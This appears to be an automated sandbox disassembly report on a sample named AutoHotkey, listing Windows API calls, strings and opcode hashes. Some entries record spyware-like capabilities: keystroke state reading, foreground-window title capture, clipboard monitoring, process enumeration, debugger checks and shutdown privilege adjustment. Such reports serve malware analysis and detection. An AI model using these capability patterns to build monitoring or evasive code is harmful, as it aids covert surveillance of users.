                                      • String ID: $$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$Error text not found (please report)$LF)$NO_START_OPT)$UCP)$UTF16)$no error
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0045F635
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 0045F647
                                      • __wcstoi64.LIBCMT ref: 0045F673
                                        • Part of subcall function 0049A060: wcstoxq.LIBCMT ref: 0049A081
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0045F694
                                      • __wsplitpath.LIBCMT ref: 0045F6D5
                                      • __wcsicoll.LIBCMT ref: 0045F725
                                      • Process32NextW.KERNEL32(?,?), ref: 0045F73B
                                      • CloseHandle.KERNEL32(00000000), ref: 0045F74E
                                      • CloseHandle.KERNEL32(00000000), ref: 0045F761
                                      • CloseHandle.KERNEL32(?), ref: 0045F778
                                      Similarity
                                      • API ID: CloseHandleProcess32$Next$CreateFirstSnapshotToolhelp32__wcsicoll__wcstoi64__wsplitpathwcstoxq
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0047C36C
                                      • FindClose.KERNEL32(00000000,?,?), ref: 0047C378
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 0047C38C
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000,?,?,?,?), ref: 0047C3AC
                                      • WriteFile.KERNEL32(00000000,004CE5F4,00000004,?,00000000,?,?,?,?), ref: 0047C3F8
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0047C416
                                      • CloseHandle.KERNEL32(00000000), ref: 0047C42B
                                      Strings
                                      Similarity
                                      • API ID: File$CloseFindWrite$AttributesCreateFirstHandle
                                      • String ID: \\?\
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcschr.LIBCMT ref: 0045E308
                                      • _wcschr.LIBCMT ref: 0045E31A
                                      • GetFileAttributesW.KERNEL32(?), ref: 0045E32A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0045E346
                                      • FindClose.KERNEL32(00000000), ref: 0045E356
                                      • CoInitialize.OLE32(00000000), ref: 0045E35E
                                      • CoCreateInstance.OLE32(004AD820,00000000,00000001,004AD810,?), ref: 0045E377
                                      • CoUninitialize.OLE32 ref: 0045E53B
                                      Similarity
                                      • API ID: FileFind_wcschr$AttributesCloseCreateFirstInitializeInstanceUninitialize
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0045F41A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0045F421
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0045F43D
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0045F465
                                      • GetLastError.KERNEL32 ref: 0045F46B
                                      • ExitWindowsEx.USER32(?,00000000), ref: 0045F47B
                                      Strings
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                      • String ID: SeShutdownPrivilege
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcsncpy$_memset
                                      • String ID: & $ Up
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetKeyboardLayout.USER32(00000000), ref: 004191F9
                                      • _memset.LIBCMT ref: 00419222
                                      • ToUnicodeEx.USER32(0000006E,00000000,?,?,00000002,00000000,00000000), ref: 00419243
                                      • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 00419269
                                      • ToUnicodeEx.USER32(0000006E,00000000,?,?,00000002,00000000,00000000), ref: 00419286
                                      • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 004192CA
                                      • MapVirtualKeyExW.USER32(?,00000002,00000000), ref: 004192F3
                                      Similarity
                                      • API ID: Unicode$KeyboardLayoutVirtual_memset
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 0040D779
                                      • _memset.LIBCMT ref: 0040D79B
                                      • _memset.LIBCMT ref: 0040D7AD
                                        • Part of subcall function 0040E4F0: CreateThread.KERNEL32(00000000,00002000,0040E820,00000000,00000000,004D860C), ref: 0040E54A
                                        • Part of subcall function 0040E4F0: SetThreadPriority.KERNEL32(00000000,0000000F,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E560
                                        • Part of subcall function 0040E4F0: PostThreadMessageW.USER32(00000000,00000417,0040635D,00000000), ref: 0040E584
                                        • Part of subcall function 0040E4F0: Sleep.KERNEL32(0000000A,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E590
                                        • Part of subcall function 0040E4F0: GetTickCount.KERNEL32 ref: 0040E5A7
                                        • Part of subcall function 0040E4F0: PeekMessageW.USER32(?,00000000,00000417,00000417,00000001), ref: 0040E5CA
                                      Strings
                                      Similarity
                                      • API ID: Thread$Message_memset$CountCreatePeekPostPrioritySleepTick_malloc
                                      • String ID: [M$DlM
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetKeyState.USER32(00000000), ref: 0041814B
                                      • GetKeyState.USER32(00000000), ref: 0041817A
                                      • GetForegroundWindow.USER32(00000000), ref: 004181B4
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004181BB
                                      • GetKeyState.USER32(00000014), ref: 004181FE
                                      Similarity
                                      • API ID: State$Window$ForegroundProcessThread
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 004A7B9E
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A7BB3
                                      • UnhandledExceptionFilter.KERNEL32(004AF894), ref: 004A7BBE
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 004A7BDA
                                      • TerminateProcess.KERNEL32(00000000), ref: 004A7BE1
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00418058
                                      • GetForegroundWindow.USER32(?,004169A2,?,00000000), ref: 004180A4
                                      • GetWindowTextW.USER32(00000000,0000000C,00000064), ref: 004180D1
                                      Strings
                                      Similarity
                                      • API ID: Window$CountForegroundTextTick
                                      • String ID: N/A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32(004B0CF8,?), ref: 0044D89F
                                      • GetLastError.KERNEL32 ref: 0044D8AA
                                      • FindClose.KERNEL32(00000000), ref: 0044D8E9
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044D940
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: File$FindTime$CloseErrorFirstLastLocal
                                      • String ID:
                                      • API String ID: 1380247339-0
                                      • Opcode ID: d8c953f07350e6d492d7481d5ae4296bc6a2a941ddd3899aa5fb8ebeb7312b30
                                      • Instruction ID: 72c8dd8c44dbd84428cf0feffc609ed1481b95ab264c779f8d5fa380fa7065da
                                      • Opcode Fuzzy Hash: d8c953f07350e6d492d7481d5ae4296bc6a2a941ddd3899aa5fb8ebeb7312b30
                                      • Instruction Fuzzy Hash: 273108B2A4430167E320EB54DC41FDB7798AB44725F14062BFD14E62D1DB79A94883AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(?,?,00432BAF,?,004B0CF8), ref: 0048405E
                                      • IsWindowVisible.USER32(00000000), ref: 00484078
                                      • IsIconic.USER32(00000000), ref: 00484090
                                      • ShowWindow.USER32(00000000,00000009), ref: 0048409D
                                        • Part of subcall function 004846A0: GetForegroundWindow.USER32(?,?,?,0040F31B,004D8348,004B0CF8,00000000,00000000), ref: 004846E1
                                        • Part of subcall function 004846A0: IsWindowVisible.USER32(00000000), ref: 004846F6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundVisible$IconicShow
                                      • String ID:
                                      • API String ID: 4166660966-0
                                      • Opcode ID: 4e80f223073adcf5a97f4acd974d2d280820098eaa66209a35bd153a755b541b
                                      • Instruction ID: 72a7a70d27a104b732ab0c7b0a969515ae819dbc46fd46077a4c61dacf5a9325
                                      • Opcode Fuzzy Hash: 4e80f223073adcf5a97f4acd974d2d280820098eaa66209a35bd153a755b541b
                                      • Instruction Fuzzy Hash: 42213021A042078EDB30BF15E80472F73E8ABD3315F10891BE649962C1E77D9CC9875A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0040544B
                                      • OpenClipboard.USER32(0002044A), ref: 0040545C
                                      • GetTickCount.KERNEL32 ref: 00405470
                                      • OpenClipboard.USER32(0002044A), ref: 004054AA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClipboardCountOpenTick
                                      • String ID:
                                      • API String ID: 420724667-0
                                      • Opcode ID: 943b752676c298d5d8ce0b57b5a37ad7194328055cc6d3ce3e93faa9a24a4fa5
                                      • Instruction ID: 5a2c79315bc2ab6014256f596f472cb258ffda3026dc413053941bdcf7d7cf30
                                      • Opcode Fuzzy Hash: 943b752676c298d5d8ce0b57b5a37ad7194328055cc6d3ce3e93faa9a24a4fa5
                                      • Instruction Fuzzy Hash: CA016D316216109BD710EB68EC84B9737A5EB9431AF148137E504E77D0CBB5DC95CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(02D91808,?,00000008,?,?,?,?,?,?,00445693,80000000,80000000), ref: 0048142F
                                      • IsIconic.USER32(00000000), ref: 0048143C
                                      • GetWindowRect.USER32(00000000,?), ref: 00481450
                                      • ClientToScreen.USER32 ref: 0048146E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ClientForegroundIconicRectScreen
                                      • String ID:
                                      • API String ID: 4031265896-0
                                      • Opcode ID: b9fbf26461994b4e550db32b16c81a8e6f4b5799a4119792cab0ebc523d34fff
                                      • Instruction ID: a224cd14b11e912ce0245c2df537cccb2ba9ea6f2f1e9c96f45049846b52b3b3
                                      • Opcode Fuzzy Hash: b9fbf26461994b4e550db32b16c81a8e6f4b5799a4119792cab0ebc523d34fff
                                      • Instruction Fuzzy Hash: 660184315042119BC310EF18C848BAFBBE8AFC5B10F05892EF89A47221E734D80697A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000003,?,00000000,00415603,?), ref: 004813B4
                                      • IsIconic.USER32(00000000), ref: 004813C1
                                      • GetWindowRect.USER32(00000000,?), ref: 004813D7
                                      • ClientToScreen.USER32 ref: 004813F5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ClientForegroundIconicRectScreen
                                      • String ID:
                                      • API String ID: 4031265896-0
                                      • Opcode ID: 5bf3df2ddf199f19f988c6dabd3ac2d37b7a4b324b1605b0fa9779e060c440b6
                                      • Instruction ID: ef43227c77fe4244feb7071e4ee5667d709072cf0f832542b1463e6d2df38ff4
                                      • Opcode Fuzzy Hash: 5bf3df2ddf199f19f988c6dabd3ac2d37b7a4b324b1605b0fa9779e060c440b6
                                      • Instruction Fuzzy Hash: 66F06D744053129BD310EF15C844A9F7BFCAF85741F40892AF84682221E338C90B8FAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Version__snwprintf
                                      • String ID: %u.%u.%u$10.0.19045
                                      • API String ID: 444779968-4060445884
                                      • Opcode ID: 2547c8b2c0ac6be14802c8af9b83a103e31ee8427db8fb390e16dd48019fa92e
                                      • Instruction ID: fa22d1e846a0ef56237d6413034975d7df6a34e03eb487fd149dbe67e6c2f83b
                                      • Opcode Fuzzy Hash: 2547c8b2c0ac6be14802c8af9b83a103e31ee8427db8fb390e16dd48019fa92e
                                      • Instruction Fuzzy Hash: 3A018F71647201DFC704CF59EC85AAA3BE0E74C744B92417FE80587366C7798890ABEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(0002044A,00000415,00000001,00000000), ref: 0041E474
                                      • SetClipboardViewer.USER32(0002044A), ref: 0041E487
                                      • ChangeClipboardChain.USER32(0002044A,?), ref: 0041E4C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Clipboard$ChainChangeMessagePostViewer
                                      • String ID:
                                      • API String ID: 1822368796-0
                                      • Opcode ID: 18ea1e5fd26aa9e1efd105072f5c381c59705bbc9ff5efda4149b90fa229d241
                                      • Instruction ID: 615a4a8381e90c97df675dd18c19a9baef449b849928be8fe3ed95bbf508b358
                                      • Opcode Fuzzy Hash: 18ea1e5fd26aa9e1efd105072f5c381c59705bbc9ff5efda4149b90fa229d241
                                      • Instruction Fuzzy Hash: D1013C74652340EBDB20DB74EC44B963BE4E745388F09452AE949873A2C3789850C75E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetComputerNameW.KERNEL32(?), ref: 0044F474
                                      • GetUserNameW.ADVAPI32(?,?), ref: 0044F485
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Name$ComputerUser
                                      • String ID:
                                      • API String ID: 4229901323-0
                                      • Opcode ID: 484acdd6b1c0c57ed577efa55293d0ceabe5b9d93c65d1706b9fa83a50fc031c
                                      • Instruction ID: 2eec10a07e1b708c8ddde2035b577e4f1299c94cc13578faf3904e75852fd6a6
                                      • Opcode Fuzzy Hash: 484acdd6b1c0c57ed577efa55293d0ceabe5b9d93c65d1706b9fa83a50fc031c
                                      • Instruction Fuzzy Hash: A1019A315082018BD724DF64C948BAB77F1FFA8300F44892DE89A87290FB7CDA08C786
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e4f874815ee760f27c5a8d394161a2b9e2656fa4f507e5568db7478bd83a19f
                                      • Instruction ID: 8206dfc3c2418993cb92ddc6cedfdf08c38ab9b00d48e98c4988ffc1690278e1
                                      • Opcode Fuzzy Hash: 5e4f874815ee760f27c5a8d394161a2b9e2656fa4f507e5568db7478bd83a19f
                                      • Instruction Fuzzy Hash: 8A41F0979189110FFB100919B8F23F3ABD2CBB2332F558567D1D443BC2D22AA98FD650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: ActiveX$Button$Checkbox$ComboBox$Custom$DDL$DateTime$DropDownList$Edit$GroupBox$Hotkey$Link$ListBox$ListView$MonthCal$Pic$Picture$Progress$Radio$Slider$StatusBar$Tab$Tab2$Tab3$Text$TreeView$UpDown
                                      • API String ID: 3832890014-2446625512
                                      • Opcode ID: 0c9813ba75d5d7f9bb8611c3a2c34c497686d360695a120f654efb874f00ab1e
                                      • Instruction ID: 8e6eefcf677a37afb30473ab4d9297b716c2d685bf85666f1be762190c1a4142
                                      • Opcode Fuzzy Hash: 0c9813ba75d5d7f9bb8611c3a2c34c497686d360695a120f654efb874f00ab1e
                                      • Instruction Fuzzy Hash: 6A51D25DEC1A11325E15352A2E43BDF26881C21B4BBC4447FFC14A4342F78EEA5AE0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: ACos$ASin$ATan$Abs$Asc$BitAnd$BitNot$BitOr$BitShiftLeft$BitShiftRight$BitXOr$Ceil$Chr$Cos$Deref$Exp$Floor$HTML$Log$Mod$Pow$Round$Sin$Sqrt$Tan
                                      • API String ID: 3832890014-879508146
                                      • Opcode ID: 59ba3e320e0dd33247e86ee0a6514d634571ec893d2a737da14127a418b879b6
                                      • Instruction ID: e2e877aa6906a3876d3d4ab0c8446477b55f34a616459166d3f4f64c590871d9
                                      • Opcode Fuzzy Hash: 59ba3e320e0dd33247e86ee0a6514d634571ec893d2a737da14127a418b879b6
                                      • Instruction Fuzzy Hash: 23515969B41A0132EE11302E5E03BDF64899F61B4BFC4847BFC08C5281F78EDA4690EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Add$Check$Choose$ChooseString$Delete$Disable$EditPaste$Enable$ExStyle$Hide$HideDropDown$Show$ShowDropDown$Style$TabLeft$TabRight$Uncheck
                                      • API String ID: 3832890014-3688457572
                                      • Opcode ID: 056f84e6500b89c183b62c059faa8617a6f0616dad51a137515ef0a9a638aebd
                                      • Instruction ID: 7e664702d1de0f518fc54228fd96b846c2e5a3abcbed55658410ec64fc75da02
                                      • Opcode Fuzzy Hash: 056f84e6500b89c183b62c059faa8617a6f0616dad51a137515ef0a9a638aebd
                                      • Instruction Fuzzy Hash: 42316C69B81A2032EE11212E4E53BDF64895B61B4BFC4447BFC04D4281F78EEE5190AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Aqua$Black$Blue$Default$Fuchsia$Gray$Green$Lime$Maroon$Navy$Olive$Purple$Red$Silver$Teal$White$Yellow
                                      • API String ID: 3832890014-3452233305
                                      • Opcode ID: e953cf14bfa1a87d2d2c328e50c44b784998a4171aaea69d5b5251f51353cb09
                                      • Instruction ID: 726b28583ebca500ab2d58dbbd22713e2767284c0cfe0b2a653e5f0a47bbdd49
                                      • Opcode Fuzzy Hash: e953cf14bfa1a87d2d2c328e50c44b784998a4171aaea69d5b5251f51353cb09
                                      • Instruction Fuzzy Hash: 08313E4DB4161122EF55326E1D02B9F24886F6174BFD4497FFC10D1392FB8EDA0A92AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AtEOF$Close$Encoding$Failed to connect to an active debugger client.$FileObject$Handle$Length$Line$Pos$Position$RawRead$RawWrite$Read$Seek$Tell$Write$__Handle
                                      • API String ID: 0-3077144313
                                      • Opcode ID: a799f9cc4942b253c6be35b22cc1a867ff1cb94cb7c810deada22efb6e8465fb
                                      • Instruction ID: efa3de3124102ef219fdaca7b61e9f37e6a83230580533ca16219c6744846b1c
                                      • Opcode Fuzzy Hash: a799f9cc4942b253c6be35b22cc1a867ff1cb94cb7c810deada22efb6e8465fb
                                      • Instruction Fuzzy Hash: 0F612C31A0010466DB1456278D41FEB33A85B2930AF95C2BFEC0DAB351F76DED06D6AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

